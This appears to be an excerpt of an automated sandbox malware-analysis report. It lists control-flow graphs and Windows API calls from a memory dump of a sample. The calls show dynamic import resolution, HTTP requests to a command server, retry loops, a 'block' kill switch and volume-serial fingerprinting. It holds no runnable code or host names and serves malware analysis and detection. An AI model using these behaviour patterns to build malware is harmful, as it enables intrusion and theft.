                                control_flow_graph 633 99c10-99c1a 634 99c20-9a031 GetProcAddress * 43 633->634 635 9a036-9a0ca LoadLibraryA * 8 633->635 634->635 636 9a0cc-9a141 GetProcAddress * 5 635->636 637 9a146-9a14d 635->637 636->637 638 9a153-9a211 GetProcAddress * 8 637->638 639 9a216-9a21d 637->639 638->639 640 9a298-9a29f 639->640 641 9a21f-9a293 GetProcAddress * 5 639->641 642 9a2a5-9a332 GetProcAddress * 6 640->642 643 9a337-9a33e 640->643 641->640 642->643 644 9a41f-9a426 643->644 645 9a344-9a41a GetProcAddress * 9 643->645 646 9a428-9a49d GetProcAddress * 5 644->646 647 9a4a2-9a4a9 644->647 645->644 646->647 648 9a4ab-9a4d7 GetProcAddress * 2 647->648 649 9a4dc-9a4e3 647->649 648->649 650 9a515-9a51c 649->650 651 9a4e5-9a510 GetProcAddress * 2 649->651 652 9a612-9a619 650->652 653 9a522-9a60d GetProcAddress * 10 650->653 651->650 654 9a61b-9a678 GetProcAddress * 4 652->654 655 9a67d-9a684 652->655 653->652 654->655 656 9a69e-9a6a5 655->656 657 9a686-9a699 GetProcAddress 655->657 658 9a708-9a709 656->658 659 9a6a7-9a703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(77190000,00CF5230), ref: 00099C2D
                                • GetProcAddress.KERNEL32(77190000,00CF5310), ref: 00099C45
                                • GetProcAddress.KERNEL32(77190000,00D09040), ref: 00099C5E
                                • GetProcAddress.KERNEL32(77190000,00D08FF8), ref: 00099C76
                                • GetProcAddress.KERNEL32(77190000,00D09058), ref: 00099C8E
                                • GetProcAddress.KERNEL32(77190000,00D0D5C8), ref: 00099CA7
                                • GetProcAddress.KERNEL32(77190000,00CFA5D0), ref: 00099CBF
                                • GetProcAddress.KERNEL32(77190000,00D0D3A0), ref: 00099CD7
                                • GetProcAddress.KERNEL32(77190000,00D0D358), ref: 00099CF0
                                • GetProcAddress.KERNEL32(77190000,00D0D370), ref: 00099D08
                                • GetProcAddress.KERNEL32(77190000,00D0D568), ref: 00099D20
                                • GetProcAddress.KERNEL32(77190000,00CF5030), ref: 00099D39
                                • GetProcAddress.KERNEL32(77190000,00CF50D0), ref: 00099D51
                                • GetProcAddress.KERNEL32(77190000,00CF5330), ref: 00099D69
                                • GetProcAddress.KERNEL32(77190000,00CF5050), ref: 00099D82
                                • GetProcAddress.KERNEL32(77190000,00D0D448), ref: 00099D9A
                                • GetProcAddress.KERNEL32(77190000,00D0D538), ref: 00099DB2
                                • GetProcAddress.KERNEL32(77190000,00CFA760), ref: 00099DCB
                                • GetProcAddress.KERNEL32(77190000,00CF52D0), ref: 00099DE3
                                • GetProcAddress.KERNEL32(77190000,00D0D628), ref: 00099DFB
                                • GetProcAddress.KERNEL32(77190000,00D0D5E0), ref: 00099E14
                                • GetProcAddress.KERNEL32(77190000,00D0D460), ref: 00099E2C
                                • GetProcAddress.KERNEL32(77190000,00D0D478), ref: 00099E44
                                • GetProcAddress.KERNEL32(77190000,00CF5290), ref: 00099E5D
                                • GetProcAddress.KERNEL32(77190000,00D0D4C0), ref: 00099E75
                                • GetProcAddress.KERNEL32(77190000,00D0D490), ref: 00099E8D
                                • GetProcAddress.KERNEL32(77190000,00D0D340), ref: 00099EA6
                                • GetProcAddress.KERNEL32(77190000,00D0D388), ref: 00099EBE
                                • GetProcAddress.KERNEL32(77190000,00D0D5F8), ref: 00099ED6
                                • GetProcAddress.KERNEL32(77190000,00D0D3B8), ref: 00099EEF
                                • GetProcAddress.KERNEL32(77190000,00D0D3E8), ref: 00099F07
                                • GetProcAddress.KERNEL32(77190000,00D0D550), ref: 00099F1F
                                • GetProcAddress.KERNEL32(77190000,00D0D4F0), ref: 00099F38
                                • GetProcAddress.KERNEL32(77190000,00CFFAE0), ref: 00099F50
                                • GetProcAddress.KERNEL32(77190000,00D0D598), ref: 00099F68
                                • GetProcAddress.KERNEL32(77190000,00D0D4D8), ref: 00099F81
                                • GetProcAddress.KERNEL32(77190000,00CF52F0), ref: 00099F99
                                • GetProcAddress.KERNEL32(77190000,00D0D520), ref: 00099FB1
                                • GetProcAddress.KERNEL32(77190000,00CF50B0), ref: 00099FCA
                                • GetProcAddress.KERNEL32(77190000,00D0D580), ref: 00099FE2
                                • GetProcAddress.KERNEL32(77190000,00D0D610), ref: 00099FFA
                                • GetProcAddress.KERNEL32(77190000,00CF5170), ref: 0009A013
                                • GetProcAddress.KERNEL32(77190000,00CF5190), ref: 0009A02B
                                • LoadLibraryA.KERNEL32(00D0D4A8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A03D
                                • LoadLibraryA.KERNEL32(00D0D3D0,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A04E
                                • LoadLibraryA.KERNEL32(00D0D400,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A060
                                • LoadLibraryA.KERNEL32(00D0D418,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A072
                                • LoadLibraryA.KERNEL32(00D0D5B0,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A083
                                • LoadLibraryA.KERNEL32(00D0D430,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A095
                                • LoadLibraryA.KERNEL32(00D0D508,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0A7
                                • LoadLibraryA.KERNEL32(00D0D7D8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0B8
                                • GetProcAddress.KERNEL32(77040000,00CF51B0), ref: 0009A0DA
                                • GetProcAddress.KERNEL32(77040000,00D0D7F0), ref: 0009A0F2
                                • GetProcAddress.KERNEL32(77040000,00D08C60), ref: 0009A10A
                                • GetProcAddress.KERNEL32(77040000,00D0D640), ref: 0009A123
                                • GetProcAddress.KERNEL32(77040000,00CF51F0), ref: 0009A13B
                                • GetProcAddress.KERNEL32(704D0000,00CFA5F8), ref: 0009A160
                                • GetProcAddress.KERNEL32(704D0000,00CF5410), ref: 0009A179
                                • GetProcAddress.KERNEL32(704D0000,00CFA878), ref: 0009A191
                                • GetProcAddress.KERNEL32(704D0000,00D0D7C0), ref: 0009A1A9
                                • GetProcAddress.KERNEL32(704D0000,00D0D6E8), ref: 0009A1C2
                                • GetProcAddress.KERNEL32(704D0000,00CF5450), ref: 0009A1DA
                                • GetProcAddress.KERNEL32(704D0000,00CF5650), ref: 0009A1F2
                                • GetProcAddress.KERNEL32(704D0000,00D0D658), ref: 0009A20B
                                • GetProcAddress.KERNEL32(768D0000,00CF53B0), ref: 0009A22C
                                • GetProcAddress.KERNEL32(768D0000,00CF5430), ref: 0009A244
                                • GetProcAddress.KERNEL32(768D0000,00D0D700), ref: 0009A25D
                                • GetProcAddress.KERNEL32(768D0000,00D0D670), ref: 0009A275
                                • GetProcAddress.KERNEL32(768D0000,00CF5470), ref: 0009A28D
                                • GetProcAddress.KERNEL32(75790000,00CFA4B8), ref: 0009A2B3
                                • GetProcAddress.KERNEL32(75790000,00CFA6C0), ref: 0009A2CB
                                • GetProcAddress.KERNEL32(75790000,00D0D688), ref: 0009A2E3
                                • GetProcAddress.KERNEL32(75790000,00CF5610), ref: 0009A2FC
                                • GetProcAddress.KERNEL32(75790000,00CF54B0), ref: 0009A314
                                • GetProcAddress.KERNEL32(75790000,00CFA710), ref: 0009A32C
                                • GetProcAddress.KERNEL32(75A10000,00D0D718), ref: 0009A352
                                • GetProcAddress.KERNEL32(75A10000,00CF5490), ref: 0009A36A
                                • GetProcAddress.KERNEL32(75A10000,00D08B50), ref: 0009A382
                                • GetProcAddress.KERNEL32(75A10000,00D0D730), ref: 0009A39B
                                • GetProcAddress.KERNEL32(75A10000,00D0D6A0), ref: 0009A3B3
                                • GetProcAddress.KERNEL32(75A10000,00CF56F0), ref: 0009A3CB
                                • GetProcAddress.KERNEL32(75A10000,00CF5670), ref: 0009A3E4
                                • GetProcAddress.KERNEL32(75A10000,00D0D6D0), ref: 0009A3FC
                                • GetProcAddress.KERNEL32(75A10000,00D0D748), ref: 0009A414
                                • GetProcAddress.KERNEL32(76850000,00CF55F0), ref: 0009A436
                                • GetProcAddress.KERNEL32(76850000,00D0D778), ref: 0009A44E
                                • GetProcAddress.KERNEL32(76850000,00D0D6B8), ref: 0009A466
                                • GetProcAddress.KERNEL32(76850000,00D0D760), ref: 0009A47F
                                • GetProcAddress.KERNEL32(76850000,00D0D790), ref: 0009A497
                                • GetProcAddress.KERNEL32(75690000,00CF5630), ref: 0009A4B8
                                • GetProcAddress.KERNEL32(75690000,00CF5390), ref: 0009A4D1
                                • GetProcAddress.KERNEL32(769C0000,00CF54F0), ref: 0009A4F2
                                • GetProcAddress.KERNEL32(769C0000,00D0D7A8), ref: 0009A50A
                                • GetProcAddress.KERNEL32(6F8C0000,00CF55D0), ref: 0009A530
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5550), ref: 0009A548
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5710), ref: 0009A560
                                • GetProcAddress.KERNEL32(6F8C0000,00D0D0A0), ref: 0009A579
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5510), ref: 0009A591
                                • GetProcAddress.KERNEL32(6F8C0000,00CF56B0), ref: 0009A5A9
                                • GetProcAddress.KERNEL32(6F8C0000,00CF53D0), ref: 0009A5C2
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5530), ref: 0009A5DA
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0009A5F1
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0009A607
                                • GetProcAddress.KERNEL32(75D90000,00D0D268), ref: 0009A629
                                • GetProcAddress.KERNEL32(75D90000,00D08C50), ref: 0009A641
                                • GetProcAddress.KERNEL32(75D90000,00D0D118), ref: 0009A659
                                • GetProcAddress.KERNEL32(75D90000,00D0D0B8), ref: 0009A672
                                • GetProcAddress.KERNEL32(76470000,00CF5570), ref: 0009A693
                                • GetProcAddress.KERNEL32(6D900000,00D0D088), ref: 0009A6B4
                                • GetProcAddress.KERNEL32(6D900000,00CF5690), ref: 0009A6CD
                                • GetProcAddress.KERNEL32(6D900000,00D0D298), ref: 0009A6E5
                                • GetProcAddress.KERNEL32(6D900000,00D0D0D0), ref: 0009A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                • Instruction ID: 78bf24dfea621ae367f77698703bb4e81ba6fc1d1631229e38bf19e7ff023af7
                                • Opcode Fuzzy Hash: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                • Instruction Fuzzy Hash: 62627EB5601288AFC344DFA8FD8CD6AB7F9F78C309314861AA609C7234D7399859DF52

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 86280-8630b call 9a7a0 call 847b0 call 9a740 InternetOpenA StrCmpCA 1040 8630d 1033->1040 1041 86314-86318 1033->1041 1040->1041 1042 86509-86525 call 9a7a0 call 9a800 * 2 1041->1042 1043 8631e-86342 InternetConnectA 1041->1043 1062 86528-8652d 1042->1062 1045 86348-8634c 1043->1045 1046 864ff-86503 InternetCloseHandle 1043->1046 1048 8635a 1045->1048 1049 8634e-86358 1045->1049 1046->1042 1050 86364-86392 HttpOpenRequestA 1048->1050 1049->1050 1052 86398-8639c 1050->1052 1053 864f5-864f9 InternetCloseHandle 1050->1053 1055 8639e-863bf InternetSetOptionA 1052->1055 1056 863c5-86405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 8642c-8644b call 98940 1056->1058 1059 86407-86427 call 9a740 call 9a800 * 2 1056->1059 1067 864c9-864e9 call 9a740 call 9a800 * 2 1058->1067 1068 8644d-86454 1058->1068 1059->1062 1067->1062 1071 86456-86480 InternetReadFile 1068->1071 1072 864c7-864ef InternetCloseHandle 1068->1072 1073 8648b 1071->1073 1074 86482-86489 1071->1074 1072->1053 1073->1072 1074->1073 1078 8648d-864c5 call 9a9b0 call 9a8a0 call 9a800 1074->1078 1078->1071
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                • HttpOpenRequestA.WININET(00000000,GET,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00086385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000863FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008646D
                                • InternetCloseHandle.WININET(00000000), ref: 000864EF
                                • InternetCloseHandle.WININET(00000000), ref: 000864F9
                                • InternetCloseHandle.WININET(00000000), ref: 00086503
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                • Instruction ID: 41455f1b72bcb1ff831e1698f0a75cfab96611eb94c8e9beec5bf36a60018942
                                • Opcode Fuzzy Hash: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                • Instruction Fuzzy Hash: DA715071A00218ABDF24EFA0DC49FEEB7B4FB45704F108158F10A6B191DBB56A89DF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 95510-95577 call 95ad0 call 9a820 * 3 call 9a740 * 4 1106 9557c-95583 1090->1106 1107 95585-955b6 call 9a820 call 9a7a0 call 81590 call 951f0 1106->1107 1108 955d7-9564c call 9a740 * 2 call 81590 call 952c0 call 9a8a0 call 9a800 call 9aad0 StrCmpCA 1106->1108 1124 955bb-955d2 call 9a8a0 call 9a800 1107->1124 1134 95693-956a9 call 9aad0 StrCmpCA 1108->1134 1138 9564e-9568e call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1108->1138 1124->1134 1139 957dc-95844 call 9a8a0 call 9a820 * 2 call 81670 call 9a800 * 4 call 96560 call 81550 1134->1139 1140 956af-956b6 1134->1140 1138->1134 1270 95ac3-95ac6 1139->1270 1143 957da-9585f call 9aad0 StrCmpCA 1140->1143 1144 956bc-956c3 1140->1144 1163 95991-959f9 call 9a8a0 call 9a820 * 2 call 81670 call 9a800 * 4 call 96560 call 81550 1143->1163 1164 95865-9586c 1143->1164 1148 9571e-95793 call 9a740 * 2 call 81590 call 952c0 call 9a8a0 call 9a800 call 9aad0 StrCmpCA 1144->1148 1149 956c5-95719 call 9a820 call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1144->1149 1148->1143 1249 95795-957d5 call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1148->1249 1149->1143 1163->1270 1170 9598f-95a14 call 9aad0 StrCmpCA 1164->1170 1171 95872-95879 1164->1171 1200 95a28-95a91 call 9a8a0 call 9a820 * 2 call 81670 call 9a800 * 4 call 96560 call 81550 1170->1200 1201 95a16-95a21 Sleep 1170->1201 1179 9587b-958ce call 9a820 call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1171->1179 1180 958d3-95948 call 9a740 * 2 call 81590 call 952c0 call 9a8a0 call 9a800 call 9aad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 9594a-9598a call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1180->1275 1200->1270 1201->1106 1249->1143 1275->1170
                                APIs
                                  • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                  • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000956A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095857
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 000952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                  • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 0009532F
                                  • Part of subcall function 000952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                  • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 00095383
                                  • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 000953AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0009578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00095A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                • Instruction ID: 8987cf73115bf4b3ed1d96451ade0b5a555284414a49c76dc9dcdb0194dea2a8
                                • Opcode Fuzzy Hash: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                • Instruction Fuzzy Hash: 4EE11F71A205089ACF14FBA0EC57EEE737CAF55340F508528B50666493EF346A09EBD2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 917a0-917cd call 9aad0 StrCmpCA 1304 917cf-917d1 ExitProcess 1301->1304 1305 917d7-917f1 call 9aad0 1301->1305 1309 917f4-917f8 1305->1309 1310 917fe-91811 1309->1310 1311 919c2-919cd call 9a800 1309->1311 1313 9199e-919bd 1310->1313 1314 91817-9181a 1310->1314 1313->1309 1315 91849-91858 call 9a820 1314->1315 1316 918ad-918be StrCmpCA 1314->1316 1317 918cf-918e0 StrCmpCA 1314->1317 1318 9198f-91999 call 9a820 1314->1318 1319 91821-91830 call 9a820 1314->1319 1320 9185d-9186e StrCmpCA 1314->1320 1321 9187f-91890 StrCmpCA 1314->1321 1322 918f1-91902 StrCmpCA 1314->1322 1323 91951-91962 StrCmpCA 1314->1323 1324 91970-91981 StrCmpCA 1314->1324 1325 91913-91924 StrCmpCA 1314->1325 1326 91932-91943 StrCmpCA 1314->1326 1327 91835-91844 call 9a820 1314->1327 1315->1313 1342 918ca 1316->1342 1343 918c0-918c3 1316->1343 1344 918ec 1317->1344 1345 918e2-918e5 1317->1345 1318->1313 1319->1313 1338 9187a 1320->1338 1339 91870-91873 1320->1339 1340 9189e-918a1 1321->1340 1341 91892-9189c 1321->1341 1346 9190e 1322->1346 1347 91904-91907 1322->1347 1329 9196e 1323->1329 1330 91964-91967 1323->1330 1332 9198d 1324->1332 1333 91983-91986 1324->1333 1348 91930 1325->1348 1349 91926-91929 1325->1349 1350 9194f 1326->1350 1351 91945-91948 1326->1351 1327->1313 1329->1313 1330->1329 1332->1313 1333->1332 1338->1313 1339->1338 1355 918a8 1340->1355 1341->1355 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 000917C5
                                • ExitProcess.KERNEL32 ref: 000917D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: e8dd4679bf811d04dfddd7606a015b7120fdc797e67662556eac41bbaccebbe3
                                • Instruction ID: ea90c2cad7ec20d308a4c38e85c13639ac91004d53b5c6541e4293bc48d914a6
                                • Opcode Fuzzy Hash: e8dd4679bf811d04dfddd7606a015b7120fdc797e67662556eac41bbaccebbe3
                                • Instruction Fuzzy Hash: F15128B5B0420AEBDF14DFA0DA58AFE77B5BF44704F208048E906AB250D771E951EB62

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 97500-9754a GetWindowsDirectoryA 1357 9754c 1356->1357 1358 97553-975c7 GetVolumeInformationA call 98d00 * 3 1356->1358 1357->1358 1365 975d8-975df 1358->1365 1366 975fc-97617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 975e1-975fa call 98d00 1365->1367 1369 97619-97626 call 9a740 1366->1369 1370 97628-97658 wsprintfA call 9a740 1366->1370 1367->1365 1377 9767e-9768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00097542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0009760A
                                • wsprintfA.USER32 ref: 00097640
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
